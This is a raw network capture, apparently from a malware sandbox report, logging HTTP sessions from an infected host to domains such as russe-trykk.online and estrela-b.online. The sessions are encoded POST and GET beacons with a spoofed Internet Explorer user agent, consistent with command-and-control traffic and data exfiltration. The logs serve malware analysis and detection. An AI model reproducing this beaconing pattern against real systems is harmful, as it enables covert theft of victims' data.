                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1SkmENZorrkuEIbAoShXOz3eRkydVU81n6EwpBRlzRwiP9FXHqnuoMPF2x/far0s/EcQ66GSXGDE5Kbq/RfIXfATnYt9ddB4JIGGU2u4I0lIERBpjD/+fqoIXcEDHJ4GoreAwQWQZqPU08Tz7tpl4yfAUggl55U90DSYpc4TixVHED6GDBHwu9xgLOaUKnxfRGTsklTdVr8DfykkheytvRgI3C0rDh8EWvmsMLr9Nn+QbNU7CxsZdRWSnFjLueBBGNMlmLg/FsXb+vp5ZmLkI+xbxCbOrWXEDdWjQF42Unxm1YnOrp3c/S/g2+uGD1LbhRmdQtzZFVedwYkPW8LtaRu8XTlR9bY+9P/nn161DKJsK7tlY9lG67NgBGiGvXXSJsnV+LzdXA6msoNhqHrqFdsQCCQbtlr3/IJdUYHhMnFVlYbe6sg8PAxABL0rlUNMffH67S8bHfqA6m3ov9/G/swz/oOs+PALGBvaYuySO/+hmRtKgFEhv7w/K7iAyISIU8exRO8aUeZ68+47VIl/n0icj0Q1CcjaS4lItXsIuPI77z6kvZc4pECgXE30RE8loAqZYes1PR5Y33kUQZSbhvdcsMMT/sSCW835KewtMmWm6XM7kdfQCPneL2VWj+Aa26W4NeuRIHCwIbiJkv
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.637145996 CEST3867OUTData Raw: 69 2b 33 38 68 57 62 75 6d 6c 73 38 4e 51 59 49 2b 30 6f 43 4a 42 61 7a 57 4b 52 51 59 55 41 77 32 66 5a 54 66 41 6f 6d 52 59 5a 67 42 4e 47 51 34 73 62 78 43 4d 67 68 41 50 34 7a 2b 42 4b 46 54 78 73 47 47 6d 64 35 48 6f 52 64 79 4a 6a 77 39 77
                                                                                                                                                                                                                        Data Ascii: i+38hWbumls8NQYI+0oCJBazWKRQYUAw2fZTfAomRYZgBNGQ4sbxCMghAP4z+BKFTxsGGmd5HoRdyJjw9wtfCf7fgMJoZ+eggNhk7BOmbFalw4DgEkkMBK46R2lrvX6zLcmkqzcYyiYjVIEaqsk54ombiSsnxCEsrGIFYRbSiWFpyh4r/MuohXUQboaumZrvfF1QoxKoMXzn4AzsOMDLf1AFeTG/yOikbjtpa7Lf5sQVyEaUVWs
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.637197018 CEST2830OUTData Raw: 6d 58 6e 32 62 6f 41 52 79 62 4e 49 30 47 43 77 36 6a 34 4d 49 74 36 36 53 35 75 49 43 48 4f 44 71 53 61 4e 35 52 30 51 58 6e 51 41 42 51 36 51 51 71 73 51 39 37 65 46 6e 35 2f 47 4e 46 76 43 65 68 35 30 32 35 6f 48 75 77 78 76 4a 4c 55 37 72 47
                                                                                                                                                                                                                        Data Ascii: mXn2boARybNI0GCw6j4MIt66S5uICHODqSaN5R0QXnQABQ6QQqsQ97eFn5/GNFvCeh5025oHuwxvJLU7rGmC8K60CxPBKlNil9z9Qnft5gRizdSFi4jcYC0pYiC7/TeE3bX2BRCy8X9oA1MJG825Rr+lDtZ/imiT1Y2oUO57QI0d9Z+DWcuNRgKTRpono2V+UkH3F8GPaS4AvMpifhh0A5TpECemBk+Qydxc3g7+KUZ/B0V9zQb
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.813774109 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:15 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?bI7myBa (;mK(eHV 2
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.813819885 CEST277INData Raw: d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f 9e 64 c3 64 76 c0 ce 9f 1c f9 7a 1c 5f 08 b9 29 4a 4f c4 7f 02 ce 06 8c 13 32 b9 d1 80 38 a6 8e 48 5b 5d fb c1 ed ff 07 ec cb 61 08 30 39 23 4c c1 17 f3 ae a7
                                                                                                                                                                                                                        Data Ascii: H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF)56/H[%/sF[k1?s;#p4n


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        77192.168.11.2049869162.241.63.7780
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.290411949 CEST538OUTGET /65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g= HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.553623915 CEST571INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:18 GMT
                                                                                                                                                                                                                        Server: nginx/1.23.4
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                                                                                        Location: http://estrela-b.online/65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g=
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        X-Server-Cache: true
                                                                                                                                                                                                                        X-Proxy-Cache: MISS


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        78192.168.11.2049870185.134.245.11380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.777250051 CEST823OUTPOST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 44 4e 75 6d 78 55 62 69 2b 79 53 55 43 30 47 54 6c 71 65 41 67 58 64 49 4e 62 78 4a 67 72 35 78 37 68 78 79 6d 75 6f 4a 70 6f 63 65 32 2b 34 51 63 65 5a 70 50 43 4f 51 4c 78 6d 4f 6f 2b 47 69 49 4b 2f 75 57 36 6d 78 4e 65 42 78 57 50 48 6e 41 67 37 34 69 4e 6b 32 54 52 38 66 76 76 45 62 44 6c 6c 31 50 52 59 2f 31 34 51 56 44 2b 4a 6d 55 59 2b 4e 71 49 37 59 61 4a 38 49 41 68 79 70 39 56 71 77 73 73 76 73 53 69 42 62 55 77 72 7a 46 6b 44 59 43 62 61 74 68 4d 58 62 79 70 64 48 72 79 56 71 61 70 55 6f 58 4f 77 70 59 78 52 35 59 34 6b 45 46 33 56 5a 73 30 4e 6c 44 4d 51 6b 74 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUC0GTlqeAgXdINbxJgr5x7hxymuoJpoce2+4QceZpPCOQLxmOo+GiIK/uW6mxNeBxWPHnAg74iNk2TR8fvvEbDll1PRY/14QVD+JmUY+NqI7YaJ8IAhyp9VqwssvsSiBbUwrzFkDYCbathMXbypdHryVqapUoXOwpYxR5Y4kEF3VZs0NlDMQktg==
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972397089 CEST716INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:28 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        79192.168.11.2049871185.134.245.11380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.511482000 CEST843OUTPOST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 44 4e 75 6d 78 55 62 69 2b 79 53 55 43 52 57 54 32 35 47 41 6e 33 64 4c 55 72 78 4a 75 37 35 31 37 68 39 79 6d 76 73 6a 70 36 6f 65 34 2f 49 51 66 66 5a 70 4d 43 4f 51 54 42 6d 42 31 4f 47 70 49 4b 69 52 57 37 61 78 4e 65 46 78 57 4b 6a 6e 41 58 6e 35 77 4e 6b 77 56 52 38 42 72 76 45 62 44 6c 6c 31 50 52 4e 71 31 34 6f 56 44 4f 35 6d 56 39 53 4f 6a 6f 37 62 5a 4a 38 49 58 52 79 31 39 56 71 53 73 76 72 4b 53 67 35 62 55 78 62 7a 41 6d 37 58 52 37 61 76 6c 4d 57 59 6b 71 6f 32 79 6a 74 65 4b 35 4d 68 65 74 49 47 55 48 63 6a 46 4b 51 67 47 6b 4a 72 6f 45 30 4e 42 4f 52 2f 77 69 65 46 43 50 69 41 32 42 30 68 31 55 67 6f 4e 78 46 73 57 63 6f 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUCRWT25GAn3dLUrxJu7517h9ymvsjp6oe4/IQffZpMCOQTBmB1OGpIKiRW7axNeFxWKjnAXn5wNkwVR8BrvEbDll1PRNq14oVDO5mV9SOjo7bZJ8IXRy19VqSsvrKSg5bUxbzAm7XR7avlMWYkqo2yjteK5MhetIGUHcjFKQgGkJroE0NBOR/wieFCPiA2B0h1UgoNxFsWco=
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708153009 CEST716INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:31 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        80192.168.11.2049872185.134.245.11380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.246052980 CEST1289OUTPOST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 44 4e 75 6d 78 55 62 69 2b 79 53 55 43 52 57 54 32 35 47 41 6e 33 64 4c 55 72 78 4a 75 37 35 31 37 68 39 79 6d 76 73 6a 70 36 51 65 34 4a 63 51 5a 49 4e 70 4e 43 4f 51 4e 78 6d 56 31 4f 47 4f 49 4b 71 64 57 37 58 4b 4e 59 5a 78 57 70 62 6e 49 43 54 35 71 64 6b 77 58 52 38 41 76 76 45 30 44 6d 4e 78 50 52 64 71 31 34 6f 56 44 4e 68 6d 63 49 2b 4f 76 49 37 59 61 4a 38 45 41 68 79 52 39 57 62 74 73 73 48 38 53 51 5a 62 55 52 4c 7a 43 7a 76 58 4c 37 61 70 67 4d 57 36 6b 71 30 74 79 67 5a 34 4b 35 4a 36 65 75 59 47 58 7a 64 73 43 71 73 52 55 6e 78 61 6c 46 67 4f 4f 34 5a 2b 79 69 75 4c 4a 4f 32 2f 36 33 51 68 36 45 59 63 49 51 4a 6b 4b 59 58 4b 4d 30 61 79 57 75 76 47 35 6c 38 67 4c 4f 43 73 6f 71 6e 43 4c 71 35 58 62 75 2b 4a 4e 6a 74 57 72 78 47 34 38 71 34 50 67 6d 4c 71 75 77 6c 79 56 7a 59 37 44 4b 7a 66 4c 6d 52 37 49 39 43 64 62 4d 70 47 67 2f 33 50 57 4e 54 79 6b 4c 73 63 49 44 6e 6d 6c 57 41 50 4d 6b 36 62 31 37 6d 65 7a 56 47 4a 7a 56 6f 77 67 52 59 62 43 7a 55 57 35 35 58 4e [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUCRWT25GAn3dLUrxJu7517h9ymvsjp6Qe4JcQZINpNCOQNxmV1OGOIKqdW7XKNYZxWpbnICT5qdkwXR8AvvE0DmNxPRdq14oVDNhmcI+OvI7YaJ8EAhyR9WbtssH8SQZbURLzCzvXL7apgMW6kq0tygZ4K5J6euYGXzdsCqsRUnxalFgOO4Z+yiuLJO2/63Qh6EYcIQJkKYXKM0ayWuvG5l8gLOCsoqnCLq5Xbu+JNjtWrxG48q4PgmLquwlyVzY7DKzfLmR7I9CdbMpGg/3PWNTykLscIDnmlWAPMk6b17mezVGJzVowgRYbCzUW55XNjIu+QCh+vdKBsaAdFqBN/NCZcfyW2hMZRkbHwmasI1mNsWde1RZuZwPUaPWK5QWr8NXloe+b/Bb9f97FqwhGRPp0Dw5kVtmQEKWZL0MW61shAVUkAOkFlDQY0fhVzfw0ZvnRTpZT2hq6+/xJUHqb4QbhX7Is07XCcJxSpPpk9RwzyfLHqKUSNJtT6NP8/svaGqoUsJy2JC15b9y4kkZwHYqqZsH7sW7GKUA8gpcSlPGJ6fJPO+GeBDCjwPuktRV1vEv4OQkATusYDes1eUd1N5ilm5QfEWjJzlOturGhCa22e2uh8PSJYnRhBH+jXROFOv75cSpgV
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.246110916 CEST6703OUTData Raw: 52 62 7a 46 6a 4c 63 71 6c 45 68 64 30 45 6a 30 30 4a 5a 41 39 6f 78 41 6c 44 72 48 35 4c 38 42 54 75 68 73 52 64 67 6b 46 51 75 4b 77 65 47 33 76 47 77 38 37 76 4c 71 63 46 69 6f 52 7a 51 4b 37 73 30 4e 72 57 35 44 35 4e 72 72 68 6a 6e 34 33 6a
                                                                                                                                                                                                                        Data Ascii: RbzFjLcqlEhd0Ej00JZA9oxAlDrH5L8BTuhsRdgkFQuKweG3vGw87vLqcFioRzQK7s0NrW5D5Nrrhjn43j7UfReoSYHLbEwdmfufRoIs6OZLSIR4BLTA+k7Az21/jW/TKuLfMhu1Fd+0PeRRq3oTb/2N1iCLBv/mdQ65KYSLOoH3RV+16nyvWULZIgkDMHvTrF6GBtpIvznKg7ZAcq1wFgvgdmAKOxcLF5Q9yaiPUPYlHDUG6Bp
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443314075 CEST716INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:34 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        81192.168.11.2049873185.134.245.11380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.972995043 CEST540OUTGET /13t3/?2rul-=OPGGyibZykz1HQ+fwNDr+1YpMJUD6qxq+hpAjJgj1ZR94MAkLt42BGXqMjTev/m9FIbjW4eTPcRZap/xAhCWotsEASV9n/5Kf2dVcxkz55MgVuVRQ72L8tA=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166337967 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:37 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Expires: Wed, 23 Oct 2024 17:58:37 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                                                                                        Cache-Control: public
